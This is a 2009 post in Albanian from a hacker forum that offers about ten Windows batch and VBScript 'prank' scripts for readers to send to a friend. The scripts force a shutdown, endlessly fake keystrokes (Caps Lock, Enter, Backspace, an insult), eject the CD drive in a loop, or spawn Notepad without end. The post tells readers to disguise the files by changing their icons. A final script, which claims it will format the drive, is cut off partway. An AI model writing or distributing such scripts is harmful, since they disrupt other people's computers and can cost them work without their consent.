Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 10 Skriptet me te rrezikshme per te frikesuar shokun tend

Shko poshtë 
AutoriMesazh
Armend
Admin
Admin
Armend

Numri i postimeve : 433
Poenat e Antarit : 1591
Thanks : 16
Join date : 24/03/2009
Age : 26
Location : Kosova, Prishtin

MesazhTitulli: 10 Skriptet me te rrezikshme per te frikesuar shokun tend   Sat Jun 27, 2009 9:28 pm

Te gjitha kto komanda duhet te shkruhen ne notepad .

1). Nje mesazh i vogel dhe Shymbja e PC-s te shokut tuaj :Kodi:
@echo off
msg * Nuk te dua ty
shutdown -c "Gabim je shume i marrë" -s.
Ruane si diqka.bat edhe dergojani shokut

2).Mbyllja Caps Look shokut tuaj :


Kodi:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loopRuane si diqka.VBS dhe dergone te viktima .

3).Qeljani shokut tuaj Cd drive :Kodi:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loopRuane si diqka.VBS edhe dergone .

4). Frikesojeni me ket script duke i u shtypur enter njeheresh qdo sekond shokut tuaj :Kodi:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loopRuane si diqka.VBS dhe dergone .

5). Hapne notepadin dhe shkruane Tungjatjeta si jeni ju . ky script eshte shume i ngadalshem dhe do ta frikesoje :Kodi:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Tung"
WScript.Sleep 500
WshShell.SendKeys "gja "
WScript.Sleep 500
WshShell.SendKeys ", tje"
WScript.Sleep 500
WshShell.SendKeys "ta"
WScript.Sleep 500
WshShell.SendKeys "si "
WScript.Sleep 500
WshShell.SendKeys "je"
WScript.Sleep 500
WshShell.SendKeys "n"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "ju"
WScript.Sleep 500
WshShell.SendKeys "mire"
WScript.Sleep 500
WshShell.SendKeys " po"
WScript.Sleep 500
WshShell.SendKeys "ti"
WScript.Sleep 500
WshShell.SendKeys "?
"Ruane si diqka.VBS edhe dergone .

6.) Ky script vazhdimisht e shtin ne funksion butonin backspace ( per te fshire ) :


Kodi:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loopRuane si diqka.VBS dhe dergojani shokut tuaj .

7). Ky script do te shkruaje ne PC-n e shokut tend vazhdimisht "TI JE BUDALLA" :


Kodi:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Ti je budalla."
loopRuane si diqka.VBS edhe dergone .

Cool. Hapet Vazhdimisht Notepadi ne pc-n e shokut tuaj :


Kodi:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO topRuane si diqka.bat dhe dergojani .

9).Frika me e madhe , ky script e vet shokun tuaj me zgjedh nje opcion pre 1 deri ne 5 , opcionet kan kto akcione :

1: Shymbje
2: Restart
3: E fshin hardwerin tend .
4: Net send
5: Mesazh pastaj shymbje :


Kodi:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto twoRuane si diqka.bat dhe dergone .

mundeni me ja ndrru iconen tu kliku me te djathten > protperties > change icon ....

_________________
[+] UserName: Armend
[+] Password: *******
[+] Location: Prishtinë
[+] Hoby: Hacking
[+] E-Mail: armend_a16@msn.com

[+] www.DrEnIcA-hG.Tk


DhG-CreW.Org is Back
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://drenica.albanianforum.net
 
10 Skriptet me te rrezikshme per te frikesuar shokun tend
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: Black Maind :: Hacking & Protecting-
Kërce tek: